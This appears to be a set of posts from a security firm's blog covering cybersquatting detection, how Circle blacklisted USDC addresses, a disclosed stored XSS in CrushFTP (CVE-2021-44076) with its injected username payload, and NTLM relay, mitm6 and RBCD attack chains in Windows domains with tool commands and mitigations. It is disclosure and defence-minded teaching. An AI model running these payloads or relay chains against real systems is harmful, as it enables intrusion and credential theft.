What is Cybersquatting?

By: Dom Myers
9 November 2022 at 09:00

Cybersquatting is the act of registering a domain name which looks similar to a target domain in order to perform malicious activity. This includes facilitating phishing campaigns, attacking genuine visitors who mistyped an address, or damaging a brand’s reputation. This article will cover the dangers of cybersquatting, what companies can do about it, and outline a plan for a tool which can be used to detect potentially malicious domains.

Many phishing campaigns use generic domains such as discountoffers.com which can be used against any company under the guise of offering discounts or money back. This can then be expanded to use a subdomain such as acme.discountoffers.com to more precisely target a specific brand. However, other more targeted campaigns will use names similar to a legitimate one owned by the target in the hopes that a victim either won’t notice the misspelling or will think that the domain is genuine. A real-world example of this involved Air France, which owns www.airfrance.com: a cybersquatter registered www.arifrance.com and www.airfranceairlines.com to divert users to a website selling discount travel deals.

Companies spend huge amounts of money registering domains that are similar to their primary ones in an attempt to prevent them potentially being used maliciously in the future. Due to cost and logistics, it’s impossible to register every possible domain an attacker might take advantage of, and often by the time a company considers taking such a step, some domains have already been registered. In this latter case, as it’s too late for the company to register it themselves, the next best thing is to be aware of them so action can be taken accordingly.

Common Cybersquatting Techniques

There are several routes an attacker may take in order to choose a domain which is likely to be successful against their target. The following sections detail a few of the thought processes an attacker might go through when choosing a domain using “google.com” as the sample target.

Misspelling

This is when a cybercriminal registers a misspelled domain, a practice often known as typosquatting. Here the attacker is hoping a user will accidentally type the target name incorrectly, so these domains are typically based on substituting letters with ones adjacent on the keyboard, or on characters typed in a slightly different order. Examples include:

  • googel.com
  • gogle.com
  • soogle.com

As shown below, Google has proactively registered some domains to protect their users and their trademark, redirecting them to the genuine website.

Misspelt domain redirecting to legitimate Google website

Similar looking

These are URLs which look similar to the target. Although they could be reached by a user mistyping the target domain, they may also be designed never to be typed by the victim at all; for example, used as a link in a phishing email where the attacker hopes the victim won’t notice the difference due to its similarity. Techniques for this include replacing letters with numbers, substituting “i” for “l”, swapping letters around, etc. Examples include:

  • g00gle.com
  • googie.com
  • gooogle.com

Legitimate looking

Another potential technique is registering domains which don’t contain typos and aren’t designed to look like the target, but which a victim might still believe to be genuine. This could include registering different top-level domains using the legitimate company name, or prepending/appending words to the target. Examples include:

  • googlesupport.com
  • google.net
  • google-discounts.com
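
To illustrate how a detection tool might enumerate candidates, below is a minimal TypeScript sketch combining the three techniques above. The permutation rules and the generateCandidates() function are illustrative assumptions for this article rather than existing tooling, and a real detector would use far more exhaustive rule sets.

// Minimal sketch: generate candidate cybersquatting domains for a brand name.
const generateCandidates = (name: string, tld = "com"): string[] => {
   const candidates = new Set<string>();

   // Misspelling: drop a character or swap adjacent characters (typosquatting).
   for (let i = 0; i < name.length; i++) {
      candidates.add(name.slice(0, i) + name.slice(i + 1));
      if (i < name.length - 1) {
         candidates.add(
            name.slice(0, i) + name[i + 1] + name[i] + name.slice(i + 2)
         );
      }
   }

   // Similar looking: simple homoglyph substitutions.
   const homoglyphs: Record<string, string> = { o: "0", l: "i", i: "l" };
   for (const [from, to] of Object.entries(homoglyphs)) {
      if (name.includes(from)) {
         candidates.add(name.split(from).join(to));
      }
   }

   // Legitimate looking: common prefixes/suffixes and alternative TLDs.
   ["support", "login", "discounts"].forEach((word) => {
      candidates.add(`${name}${word}`);
      candidates.add(`${name}-${word}`);
   });

   const domains = [...candidates].map((c) => `${c}.${tld}`);
   ["net", "org", "co"].forEach((altTld) => domains.push(`${name}.${altTld}`));
   return domains;
};

console.log(generateCandidates("google"));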

What can I do if someone registers my domain?

So you have identified a list of similar domains to yours. You’ve investigated and found that one of the domains has mirrored your own website and is being used to launch phishing campaigns against your employees. What do you do now?

In the United States there are two avenues for legal action:

  • Internet Corporation of Assigned Names and Numbers (ICANN)
  • Anticybersquatting Consumer Protection Act (ACPA)

ICANN Procedure

ICANN has developed the Uniform Domain Name Dispute Resolution Policy (UDRP) to resolve disputes over domains which may infringe on trademark claims. A person can bring an action by complaining that:

  • A domain name is identical or confusingly similar to a trademark or service mark in which the complainant has rights; and
  • The domain holder has no rights or legitimate interests in respect of the domain name; and
  • The domain name has been registered and is being used in bad faith.

If the action is successful, the domain will either be cancelled or transferred to you.

Legal Action Under the ACPA

The Anticybersquatting Consumer Protection Act (ACPA) was enacted in 1999 in order to combat cybersquatting such as the case described in this article. A trademark owner may bring an action against a squatter who:

  • Has a bad faith intent to profit from the trademark
  • Registers, traffics in, or uses a domain name that is
    • Identical or confusingly similar to a distinctive trademark
    • Identical or confusingly similar to or dilutive of a famous trademark
    • A trademark protected by statute

A UDRP proceeding is generally the more advisable course of action, as such proceedings tend to be faster and cheaper.

User awareness and technical solutions

As these proceedings can be time consuming (or if your business is based outside of the United States), more immediate measures can be taken to at least protect a client’s own internal users. Making employees aware of a new phishing site is one of the quickest and easiest steps that can be taken to help them stay on the lookout and reduce the chance of success for the attacker.

In addition to this, email policies can be set up to block incoming emails from these potential phishing domains so that they never reach employees in the first place. Some determined attackers may attempt to get round this by contacting employees via another medium such as telephone, coercing victims to visit their site manually via a web browser. In these cases, networking solutions may be able to help to prevent users from connecting to these malicious domains at all by blocking them at the firewall level.

Conclusion

Cybersquatting is a threat which is often overlooked, and many companies either don’t consider protection until they’ve been affected by it, or believe it’s something they aren’t able to proactively defend against. Nettitude are aiming to assist clients further in this area by developing the tools to allow domains to be continuously monitored for potentially suspicious permutations.

How Circle Banned Tornado Cash Users

28 September 2022 at 09:00

Tornado Cash is an open-source, decentralised cryptocurrency mixer. Using zero-knowledge proofs, this mixes identifiable funds with others, obscuring the original source of the funds. On 08 August 2022, the U.S. Office of Foreign Assets Control (OFAC) banned the Tornado Cash mixer, arguing that it had played a central role in the laundering of more than $7 billion.

The USD Coin (USDC) is a centralised digital currency that can be used for online payments. The issuer of the USDCs – the Circle company – guarantees that every digital coin is fully backed by actual U.S. dollars, with the value of one USDC pegged to an actual U.S. dollar. Following the ban, the Circle company started to freeze addresses linked with the Tornado Cash mixer.

This article does not aim to address any political views or opinions but rather to present an interesting case study on how this was technically achieved. We can seize this opportunity to investigate several basic but key concepts of Ethereum and Ethereum-based blockchains. For simplicity, in this article we will primarily focus on Ethereum.

Understanding ERC-20 Tokens

With Ethereum, tokens are handled by smart contracts – short, simple programs stored on the blockchain that can be called via transactions. The smart contract is then responsible, among other things, for handling users’ transactions and storing owners’ balances.

A standard ABI (Application Binary Interface) for manipulating tokens called ERC-20 (Ethereum Request for Comments 20) was released to ease interoperability, and is described in the Ethereum Improvement Proposals (EIP) 20. The USDC follows that standard.

ERC-20 specifications are fairly short. To be a valid ERC-20 token, the deployed smart contract must simply implement the following functions:

  • totalSupply()
  • balanceOf(account)
  • allowance(owner, spender)
  • approve(spender, amount)
  • transfer(recipient, amount)
  • transferFrom(sender, recipient, amount)

It must also implement the following events:

  • Transfer(from, to, value)
  • Approval(owner, spender, value)
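
For reference, the same interface can be written as a human-readable ABI for ethers.js, the library used later in this article. The fragment below is a generic ERC-20 sketch for illustration, not Circle's published ABI.

import { ethers } from "ethers";

// Minimal ERC-20 ABI covering the functions and events listed above.
const ERC20_ABI = [
   "function totalSupply() view returns (uint256)",
   "function balanceOf(address account) view returns (uint256)",
   "function allowance(address owner, address spender) view returns (uint256)",
   "function approve(address spender, uint256 amount) returns (bool)",
   "function transfer(address recipient, uint256 amount) returns (bool)",
   "function transferFrom(address sender, address recipient, uint256 amount) returns (bool)",
   "event Transfer(address indexed from, address indexed to, uint256 value)",
   "event Approval(address indexed owner, address indexed spender, uint256 value)",
];

// Any ERC-20 token can then be queried through this interface, e.g.
// new ethers.Contract(tokenAddress, ERC20_ABI, provider).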

The USDC token

To understand how the USDC was implemented we only need the smart contract address and its source code, published by Circle:

There is a subtlety here but we will not go into detail. The source code for the real ERC-20 API for USDC can be retrieved from a proxy contract, which can be found at the following address:

You can check OpenZeppelin’s Unstructured Storage proxy pattern for more information. In short, using a proxy contract is a convenient way to manage upgrades.

The totalSupply() function

The totalSupply() function is pretty much self-explanatory and can be used at any time to find out how many tokens were minted in total.

Open Etherscan and search for the USDC contract address. Go to the “Contract” tab next to “Transactions”, “Internal Txns” and “Erc20 Token Txns”. Then click on the “Read as Proxy” button and scroll down the list to “totalSupply”.

At the time of writing, this was 42039807469599550, which with the decimals applied corresponds to 42,039,807,469.599550 USDC. ERC-20 tokens can optionally implement a decimals() function, which is set to 6 here. Because we only “read” from the blockchain, these operations are free.
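
The same value can also be read programmatically. Below is a short ethers.js sketch which assumes the same HTTPS_ENDPOINT environment variable and proxy contract address used in the code later in this article.

import "dotenv/config";
import { ethers } from "ethers";

const USDC_PROXY_ADDRESS = "0xB7277a6e95992041568D9391D09d0122023778A2";

const main = async () => {
   const provider = new ethers.providers.JsonRpcProvider(
      process.env.HTTPS_ENDPOINT
   );
   const usdc = new ethers.Contract(
      USDC_PROXY_ADDRESS,
      [
         "function totalSupply() view returns (uint256)",
         "function decimals() view returns (uint8)",
      ],
      provider
   );

   const [supply, decimals] = await Promise.all([
      usdc.totalSupply(),
      usdc.decimals(),
   ]);

   // formatUnits() converts the raw integer into a human-readable amount using the token's decimals.
   console.log(`Total supply: ${ethers.utils.formatUnits(supply, decimals)} USDC`);
};

main();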

The transfer() Function

In order to send an ERC-20 token to another address, one would need to send a transaction to the transfer() function with the recipient address and the number of tokens to send as arguments. To make things easier we will only discuss here how a transaction is sent to a full Ethereum node and skip the part where it is actually added to the blockchain.

Let us examine how the transfer() function was implemented. The released code is written in Solidity. This is mostly straightforward, and not necessary to know in order to understand the following.

You can see notBlacklisted(msg.sender) and notBlacklisted(to) on lines 867 and 868. These are function modifiers, similar to Python’s decorators, and they wrap the function underneath.

The source code of the modifier is quite explicit. In Solidity, require() is a control function in which the initial parameter must be set to true, otherwise the transaction is reverted. Here the _account address is checked against the blacklisted mapping which is simply a hash table. It can be accessed with a key, i.e. the address, and it returns a value. If the address is not in the mapping, 0 is returned.

The value msg.sender is the address issuing the transaction, and to is the recipient. If none of these addresses are found in the blacklisted mapping, the _transfer() function is called and the transaction is enabled.

The blacklisted mapping is filled using the blacklist function.

Similarly, the onlyBlacklister() modifier protects unauthorised blacklisting of addresses.

TransferFrom() and Approve() functions

The transferFrom() function is very similar to the transfer() function and is mostly used by smart contracts to transfer tokens on your behalf. In theory it is possible to send tokens directly to a smart contract using transfer() and then call the desired function. However, this requires two transactions and the smart contract would have no idea about the first one.

The solution is to grant a smart contract access to transfer a limited or unlimited amount of tokens. This is achieved using the approve() function.

Following approval, the transferFrom() function can be called.

Both functions are of course covered by the notBlacklisted() modifier.
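
To illustrate the flow, here is a hedged ethers.js sketch of the approve()/transferFrom() pattern. The ownerSigner, spenderSigner and recipient values are placeholders, and the contract is assumed to expose both functions in its ABI.

import { ethers } from "ethers";

const approveAndTransferFrom = async (
   usdcContract: ethers.Contract,
   ownerSigner: ethers.Signer,
   spenderSigner: ethers.Signer,
   recipient: string
) => {
   const amount = ethers.utils.parseUnits("100", 6); // 100 USDC (6 decimals)
   const owner = await ownerSigner.getAddress();
   const spender = await spenderSigner.getAddress();

   // Step 1: the token owner grants the spender a limited allowance.
   await usdcContract.connect(ownerSigner).approve(spender, amount);

   // Step 2: the spender moves tokens from the owner's balance to the recipient.
   await usdcContract.connect(spenderSigner).transferFrom(owner, recipient, amount);
};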

How to check whether an address is blacklisted

Now that we understand how Circle can block token transfers, we can play with the smart contract to determine whether an address is banned. For the demo we will use the wallet address of Vitalik Buterin, one of Ethereum’s founders.

The smart contract exports a function called isBlacklisted; all we need to do is to call it with the desired address.

Below is a small TypeScript piece of code that does exactly that:

import "dotenv/config";
import { ethers } from "ethers";

const USDC_PROXY_ADDRESS = "0xB7277a6e95992041568D9391D09d0122023778A2";
const VITALIK_WALLET = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";

const isBlacklisted = async (
   usdcContract: ethers.Contract,
   address: string
) => {
   const ret = await usdcContract.isBlacklisted(address);
   console.log(`Wallet ${address} is ${ret ? "" : "not "}blacklisted.`);
};

const main = async () => {
   const provider = new ethers.providers.JsonRpcProvider(
      process.env.HTTPS_ENDPOINT
   );

   const usdcContract = new ethers.Contract(
      USDC_PROXY_ADDRESS,
      ["function isBlacklisted(address _account) view returns (bool)"],
      provider
   );

   await isBlacklisted(usdcContract, VITALIK_WALLET);
};

Full code is available here.

$ ts-node src/isblacklisted.ts
Wallet 0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B is not blacklisted.

Vitalik’s wallet is safe!

Or we could simply ask Etherscan again.

How to find all blacklisted addresses

We know how to check whether a single address was banned, but how can we retrieve all blacklisted addresses? Unfortunately for us, transactions are not indexed in the Ethereum blockchain and it is not possible to simply list the content of the mapping.

An important point here! Mapping cannot be used to store any secret. Anyone with a copy of the blockchain can retrieve all transaction data.

One way would be to go through every block and transaction and then dissect them to find transactions to the blacklist() function. However, this would be quite inefficient and extremely slow. Fortunately, Circle implemented an event that is issued every time an address is banned. And unlike transactions, events are indexed.

If we check the blacklist() function code, we can see the event on the last line.

The _account argument is also indexed.

To access logs, we can use the RPC method eth_getLogs() of an Ethereum node. This method accepts a few parameters:

  • fromBlock and toBlock
  • a contract address
  • and an array called topics

Topics are indexed parameters of an event, and they can be viewed as filters. The first topic, topic[0] is always the event signature, a keccak256 hash of the event name and parameters. This is easily computed using the ethers.js library.

ethers.utils.id("Blacklisted(address)");

The hash in our case is:

  • 0xffa4e6181777692565cf28528fc88fd1516ea86b56da075235fa575af6a4b855

The other topics are the arguments. For Blacklisted() it is an address. Since we want to find all events, this argument is left empty.
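
If we did want to filter on one specific address instead, the second topic would be that address left-padded to 32 bytes. A quick way to build such a topic with ethers.js is sketched below; the address used is just an example.

import { ethers } from "ethers";

// An indexed address argument is stored as a 32-byte topic (20-byte address, zero-padded).
const exampleAddress = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";
const addressTopic = ethers.utils.hexZeroPad(exampleAddress, 32);

// topics: [eventSignature, addressTopic] would match Blacklisted() events for that address only.
console.log(addressTopic);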

Even with an event filter, searching for the entire blockchain would take too long as there have been too many transactions since the genesis block. In this example we will only list Blacklisted() events that happened on the day of the ban, on 08 August 2022.

  • 2022-08-08 00:00
    • block number: 15298283
  • 2022-08-08 23:59
    • block number: 15304705

const filter = {
   address: USDC_ERC20_ADDRESS,
   fromBlock: 15298283,
   toBlock: 15304705,
   topics: [ethers.utils.id("Blacklisted(address)")],
};

Using ethers.js, we can call the getLogs() method using our filter.

const logs = await this.provider.getLogs(filter);

/* Sorting unique addresses. */
this.addresses = [
   ...new Set<string>(
      logs.map((log) =>
         ethers.utils.getAddress(`0x${log.topics[1].substr(26)}`)
      )
   ),
];

All we need to do now is to display the wallet addresses and frozen balances:

const symbol = await this.usdcContract.symbol();
console.log(`[+] ${this.addresses.length} wallet addresses found:`);

await Promise.all(
   this.addresses.map(async (address) => {
      const amount = await this.usdcContract.balanceOf(address);
      console.log(
         ` - ${address}: ${ethers.utils.formatUnits(amount, "mwei")} ${symbol}`
      );
   })
);

Running the script from the terminal gives us all the wallets that were banned that day.

> ts-node src/findbanned.ts
[+] 38 wallet addresses found:
- 0x8589427373D6D84E98730D7795D8f6f8731FDA16: 0.0 USDC
- 0xd90e2f925DA726b50C4Ed8D0Fb90Ad053324F31b: 0.0 USDC
- 0xDD4c48C0B24039969fC16D1cdF626eaB821d3384: 149.752 USDC
- 0xD4B88Df4D29F5CedD6857912842cff3b20C8Cfa3: 0.0 USDC
- 0x722122dF12D4e14e13Ac3b6895a86e84145b6967: 0.0 USDC
- 0xFD8610d20aA15b7B2E3Be39B396a1bC3516c7144: 0.0 USDC
- 0xF60dD140cFf0706bAE9Cd734Ac3ae76AD9eBC32A: 0.0 USDC
- 0xd96f2B1c14Db8458374d9Aca76E26c3D18364307: 3900.0 USDC
- 0x910Cbd523D972eb0a6f4cAe4618aD62622b39DbF: 0.0 USDC
- 0x4736dCf1b7A3d580672CcE6E7c65cd5cc9cFBa9D: 71000.0 USDC
- 0xb1C8094B234DcE6e03f10a5b673c1d8C69739A00: 0.0 USDC
- 0xA160cdAB225685dA1d56aa342Ad8841c3b53f291: 0.0 USDC
- 0xBA214C1c1928a32Bffe790263E38B4Af9bFCD659: 0.0 USDC
- 0x22aaA7720ddd5388A3c0A3333430953C68f1849b: 0.0 USDC

[...]

- 0x2717c5e28cf931547B621a5dddb772Ab6A35B701: 0.0 USDC
- 0x178169B423a011fff22B9e3F3abeA13414dDD0F1: 0.0 USDC

As mentioned previously, full code is available here.

Conclusion

Crypto assets are a new kind of asset and a blossoming technology. Understanding how Circle banned Tornado Cash users was a good excuse to explore several key concepts of the Ethereum blockchain. However, we have only scratched the surface: other assets may have different implementations, restrictions and trade-offs. So always remember the famous principle: Don’t trust, verify!

CVE-2021-44076: Cross-Site Scripting (XSS) in CrushFTP

14 September 2022 at 09:00

During the course of our work, Nettitude have identified a stored Cross-Site Scripting (XSS) vulnerability within the CrushFTP web interface.

CrushFTP is a file transfer server which supports multiple file transfer protocols, and provides a web interface for users to manage their files, as well as for administrators to manage and monitor the service.

Background

Within the /WebInterface/UserManager page of the web interface, there is an option to create a new user. Although client-side sanitization of input prevents the creation of a user whose username contains special characters, the same is not true for the server-side validation of the given data. An attacker who intercepts and modifies the traffic before the username is added to the application’s backend can create a user that contains JavaScript or HTML within the username property.

As shown below, there is a list of the most visited users displayed at the top of the page.

The list consists of <a> HTML tags that contain each username. The double-quote character is not properly sanitized inside the <a> tag allowing the insertion of JavaScript or HTML payloads within a username field, leading to cross-site scripting. In addition to this, the payload would also be executed when an attempt is made to delete the user. This is because the pop-up message that appears for confirmation does not encode usernames upon output, thus allowing crafted JavaScript or HTML payloads to be executed within the web browser.

Exploitation

CrushFTP stores the details of registered users within the filesystem in the users/MainUsers directory. The contents of this directory are shown below, with the users crushadmin, default, and TempAccount each having their own directory.

The user’s directory contains a file called user.XML, which contains the data associated with the account. This is where information such as the username, password, etc, is stored in XML format.

When attempting to create a user, after a request to check if the username already exists, the application performs a POST request towards the /WebInterface/function/ endpoint. The command used within the request is setUserItem which creates the user folder in the application’s backend containing the given information.

The text highlighted below in red is the name of the directory that will be created for the user, while the text highlighted in blue is the username that will be saved within their user.XML file. Nettitude modified this request, placing the value random_user1 within the username POST parameter and random_user2 within the username parameter in the XML data.

The new user then appeared within the users panel on the left hand side of the page.

From this, it was clear that the web application indexes the username by the name of the directory created for the user, and not by the username that is added in the user.XML file. Nettitude reproduced the previous steps, but this time replacing the username parameter with random_user"<img+src%3d1+onerror%3d"alert(1)">. This payload is designed to display a JavaScript alert when rendered within a web browser.

The application failed to validate the integrity of the data server-side, and the user’s folder was created with the payload included, as shown below.

After the operation was completed, the newly created user appeared within the users panel.

The mostVisitedLinks list was also populated with the most visited users’ profiles.

Since the username had been tampered with and no output encoding was performed prior to adding the username to the user attribute of the <a> object, the double-quote of the user attribute was escaped, and the <img> tag that was injected in the username was rendered within the page.

Given that an invalid image source was used within the payload, this meant that the onerror JavaScript event was triggered and the script executed.

If an attempt was made to delete the user, the payload would fire again in the pop-up window that appears.

The impact of a cross-site scripting attack can vary depending on the payload used, but it can usually be exploited for theft of information such as session cookies or other sensitive data, or to conduct unauthorised actions on behalf of an affected user. In this instance it may be exploited for privilege escalation or account takeover.

Conclusion

This vulnerability affected CrushFTP prior to version 9.4.0_15. Any later versions are no longer affected by this vulnerability, as the vendor was informed and performed the necessary actions to remediate the issue.

Multiple parts of the source code contribute to the payload’s execution in various fields, but the main reason behind the vulnerability is the incorrect sanitization of the username as it is processed within the backend. This can be found in the setUserItem function inside the crushftp/server/AdminControls.class file.

No input filtering was performed on the username, so special characters entered in the username field are not removed or sanitized in any way. In addition to this, no output encoding was performed when the data was displayed within the affected page itself. Proper output encoding, in combination with a strong content security policy, should always be used to mitigate the risk of cross-site scripting.
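
As a simple illustration of the kind of output encoding that would have prevented this issue, the TypeScript sketch below HTML-encodes a username before embedding it in markup. It is a generic example rather than CrushFTP's code.

// Encode characters that are significant in HTML before reflecting user input.
const htmlEncode = (value: string): string =>
   value
      .replace(/&/g, "&amp;")
      .replace(/</g, "&lt;")
      .replace(/>/g, "&gt;")
      .replace(/"/g, "&quot;")
      .replace(/'/g, "&#x27;");

// Example: building a "most visited users" link safely.
const username = 'random_user"<img src=1 onerror="alert(1)">';
const link = `<a href="/user/${encodeURIComponent(username)}">${htmlEncode(username)}</a>`;
console.log(link);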

Timeline

  1. Discovery by Nettitude: 19 November 2021
  2. CVE Assigned: 19 November 2021
  3. Vendor informed: 04 March 2022
  4. Vendor fix released: 08 March 2022

Network Relaying Abuse in a Windows Domain

31 August 2022 at 09:00

Network relaying abuse in the context of a legacy Windows authentication protocol is by no means a novel vector for privilege escalation in a domain context. However, in spite of these techniques being well understood and documented for many years, it is unfortunately still common during the course of an internal network penetration test for Nettitude consultants to escalate from a low privileged user to Domain Admin in a matter of hours (or even minutes). This is due to a handful of Active Directory and internal network misconfigurations which this article will explore.

Through the course of four scenarios, we’ll cover both longstanding and more recent attack primitives that center around relaying techniques in the hopes that network defenders can apply the mitigations contained therein.

Scenario 1 – LLMNR/NBT-NS Poisoning

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are alternative resolution protocols used to derive a machine’s IP address given its hostname on the network.

LLMNR, which is based upon the DNS format, enables name resolution in link-local scenarios and has been around since the dawn of Windows Vista. It is the spiritual successor to NBT-NS, which uses a system’s NetBIOS name to identify it on the network.

In general, name resolution (NR) protocols stand as the final fallback should suitable records not be found in local host files, DNS caches, or the configured DNS servers. One can think of the purpose of NR protocols as allowing a host to broadly query its neighbors over multicast: “Hey, does anyone have x resource, as I can’t find it anywhere else?”

These broadcasts are sent out to the entire intranet, but no measures are taken to verify the integrity of the responses or of the hosts providing them, since Microsoft views the local network as a trust boundary. As such, malicious actors can exploit what is essentially a race condition and interpose themselves as an authoritative source for name resolution by replying to LLMNR (UDP 5355) and NBT-NS (UDP 137) requests with popular open-source offensive tooling such as Responder. Crucially, if the requested resource requires authentication, the victim’s username and NetNTLM hash are summarily sent to the adversary’s spoofed authoritative node.

Mistyping, misconfigurations (either on the DNS server or client side), WPAD, or even Google Chrome can easily lead to a scenario in which the client machine relies on multicast name resolution queries and gifts a malicious man-in-the-middle its coveted hash.

In this demonstration, the attacker sets up Responder listening on eth0, using the -wF flags to start the rogue WPAD proxy server and force NTLM authentication on wpad.dat file retrieval:

Shortly thereafter, the victim (on client01 at 192.168.136.133) requests a shared resource via SMB with an unfortunate misspelling:

As demonstrated below, the attacker then responds to the name resolution query initiated by the victim via LLMNR, naming himself as the recipient and receiving the victim’s credentials in return:

From here, the user’s hash can either be cracked offline using a hash cracker like Hashcat or possibly relayed further in the environment to authenticate to other network resources via relay attacks, should mitigations such as SMB signing be disabled.

Mitigations:

  1. To disable LLMNR, open the Group Policy Editor and navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client, then ensure that the option “Turn OFF Multicast Name Resolution” is enabled.
  2. To disable NBT-NS on Windows clients, open your Network Connections and view the properties of the network adapter. Select TCP/IPv4 and select “Properties”, then select “Advanced” on the “General” tab, navigate to the WINS tab, and choose “Disable NetBIOS over TCP/IP.”

Scenario 2 – NetNTLM Relay over SMB

Continuing our exploitation of the potential consequences of LLMNR and NBT-NS broadcast traffic being present in the target environment, let’s turn our attention to relaying the NetNTLM hashes previously captured by Responder and see if more damage can be done.

Much like wine and cheese, Responder and Ntlmrelayx from the Impacket suite are the perennial pairing here. The idea is that an attacker can opt to relay captured NetNTLM hashes to any system on the network that has SMB signing turned off, which is the default setting on Windows clients.

After configuring Responder with its SMB and HTTP server deactivated (which can typically be done by editing /etc/responder/Responder.conf) and running the module via CLI as before (responder -I eth0 -wF), the attacker can then set up ntlmrelayx to listen for incoming connections with smb2 support enabled:

In this simulated scenario, an administrator on DC01 (192.168.136.132) mistypes a network share, which leads to a successful relay of the NetNTLM hash to client01 (192.168.136.133) and the dumping of the SAM, or the Security Account Manager, which is a database present on Windows machines that stores local user accounts and authentication information:

Do be advised that from MS08-068 onwards, it is impossible to relay the same NetNTLM hash back to the originating machine from which it was issued; as such, in order for this attack to work, it is necessary to relay the hash originating from DC01 to client01.

Apart from dumping the computer’s SAM, which is disastrous in and of itself, an attacker could also elect to execute arbitrary commands on the target system or even spawn an SMB session on the host, which is what shall be demonstrated next. Upon successful relay of the administrator hash to client01, a malicious actor is presented with an interactive SMB client shell on 127.0.0.1:1000 after specifying the -i flag when deploying ntlmrelayx:

From here, the attacker has full access to the C$ drive and can amplify their foothold on the network by deploying a remote access trojan (RAT) or even proliferating ransomware through the network’s file system:

Mitigations:

  1. The steadfast advice from Microsoft when it comes to any variant of the classic NTLM relay attack is to migrate from the natively vulnerable NTLM challenge-response authentication to the far more secure method of Kerberos authentication when possible. Kerberos has been Microsoft’s preferred replacement for NTLM since the inception of Windows 2000.
  2. For those organizations that must use NTLM in their environments, it is recommended that EPA (Extended Protection for Authentication) and SMB signing are enabled, which in conjunction can vastly blunt the possibility of NTLM relay attacks.

Scenario 3 – IPv6 Carnage

Another common man-in-the-middle privilege escalation vector that poses risk in an enterprise domain context stems from the abuse of IPv6, which is enabled by default on modern Windows operating systems and has taken precedence over its predecessor IPv4 since the release of Vista. As such, systems internally poll the network for IPv6 leases, which plays into an attack vector still ripe with potential in 2022. For a step-by-step breakdown of how this all works:

  1. An IPv6 client periodically sends out solicit packets on the local network, seeking an IPv6 router.
  2. When an IPv6 router is present, it sends out an advertise packet in response to the solicit packet. This advertise packet informs the client that the IPv6 router is available for DHCP services.
  3. The IPv6 client replies with a request packet to the DHCPv6 server, asking for an IPv6 configuration.
  4. Finally, the DHCPv6 server issues the IPv6 configuration to the IPv6 client, which specifies several things, including the IP address, default gateway, DNS servers, etc. This is all included in the reply packet.

The idea with this attack, which utilizes Dirk-jan Mollema’s excellent research from 2018, is that a malicious actor can interpose their machine as an IPv6 router and force authentication to their server as the authoritative DNS server on the network over any other IPv4 servers. The attacker can then in tandem utilize ntlmrelayx to relay captured credentials to the specified target machine, leading to dumping of sensitive domain information or possibly even the addition of additional computer accounts or escalated privileges.

To set up this scenario, mitm6 is launched listening on eth0 and targeting the lab.local domain along with the machine client01:

Shortly thereafter, the preferred IPv6 DNS server is displayed from the perspective of the command prompt of our client01 victim as being the attacker’s machine, where 192.168.136.132 is the IPv4 address of the lab.local domain controller:

From here, ntlmrelayx is launched targeting the relay to the domain controller with the following command, with the -6 flag ensuring that our ntlmrelayx listens for both IPv4 and IPv6 connections and the -wh flag specifying a non-existent WPAD file host:

ntlmrelayx.py -6 -t ldap://192.168.136.132 -wh netti-wpad.lab.local -l loot

After simulating the client machine rebooting and joining the network, it is observed that the attack successfully relays the client01 machine account against the DC:

This enables the attacker to gather and enumerate valuable information against the target domain environment, including group memberships, domain policies, and sensitive information disclosed in any AD object’s description fields, as demonstrated below:

It should be remarked that, while the scenario of the service account password being exposed in cleartext in the AD object’s description field is contrived for this example, it is unfortunately a practice that is still observed in modern-day engagements.

Now, while the aforementioned information dump about the targeted AD objects is certainly valuable, things can take a decisive turn for the worse should an attacker set up the NTLM relay over LDAPS. Relaying to LDAP over TLS offers an opportunity for quick compromise of an entire domain, as creating new accounts is not possible over unencrypted connections. Specifying the --delegate-access flag on ntlmrelayx and waiting for the victim to request an IPv6 address or a WPAD configuration leads to the following series of events in the attacker’s console:

Once the victim requests a new IPv6 address or WPAD configuration from the mitm6 server (this is often seen when the victim reboots their machine or plugs in their network cable again), the ntlmrelayx server receives the connection and creates a new computer account over LDAPS, which is permitted by the default AD setting which dictates that any domain user can add up to 10 computer accounts:

From here, the malicious actor can utilize getST.py from the impacket suite to take advantage of a classic resource-based constrained delegation attack vector in order to have the new computer account request service tickets for itself on behalf of any other user in the domain, including the administrator. The typical flow of this attack finishes with requesting a TGS for the CIFS service of the target computer impersonating the domain administrator and dumping the SAM with impacket’s secretsdump.py module, as previously demonstrated. In case the reader needs a refresher on the meaning of terms like TGS or a primer on Kerberos-based attacks, please consult this excellent resource as additional reading.

Should a user with functional permissions of domain admin log into one of the workstations in scope of the mitm6 attack, ntlmrelayx can be further weaponized to create a new enterprise administrator user; below, the domain administrator “henry” logs into the target machine, after which the authentication is relayed against the domain controller of the target environment:

Further in the output below, ntlmrelayx adds a new user with Replication-Get-Changes-All privileges:

At this point, it is game over for the domain’s integrity. An attacker can achieve complete domain compromise by dumping all domain user hashes from the Ntds.dit file, which is essentially the database at the heart of Active Directory:

Now that the wide-ranging ramifications of a simple IPv6 network configuration being left in its default state have been fully explored, let’s turn to discussing mitigating the factors that make this attack chain possible. Owing to the fact that there were several components abused along the way, there are several mitigation aspects to address.

Mitigations:

In summary, the mitm6 tool abuses the fact that Windows by default queries for an IPv6 address even in IPv4-only environments. If IPv6 is not internally in use, the surest way to prevent mitm6 attacks is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. However, disabling IPv6 entirely may have unwanted side effects. Setting the following predefined firewall rules to Block instead of Allow prevents the attack from working:

  • (Inbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
  • (Inbound) Core Networking – Router Advertisement (ICMPv6-In)
  • (Outbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)

Mitigating WPAD abuse:

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Mitigating relaying to LDAP:

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Mitigating resource-based delegation abuse:

As RBCD is part and parcel of intended Kerberos functionality, there is no one-click mitigation here. Most of the attack surface can however be reduced by adding administrative and key users to the Protected Users group or by marking the account as sensitive and ineligible for delegation.

Scenario 4 – Nothing but Certified Trouble

